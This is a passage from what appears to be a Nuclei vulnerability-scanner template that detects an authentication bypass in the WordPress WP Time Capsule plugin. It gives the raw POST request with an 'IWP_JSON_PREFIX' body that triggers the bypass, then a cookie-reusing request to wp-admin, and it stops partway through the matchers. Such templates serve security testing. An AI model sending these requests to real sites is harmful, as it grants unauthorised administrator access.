id: wordpress-auth-bypass-wptimecapsule info: name: WordPress WP Time Capsule Authentication Bypass author: princechaddha severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC tags: wordpress,auth-bypass,wp-plugin requests: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Connection: close Accept: */* IWP_JSON_PREFIX - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} Connection: close Accept: */* cookie-reuse: true matchers-condition: and matchers: - type: word words: - '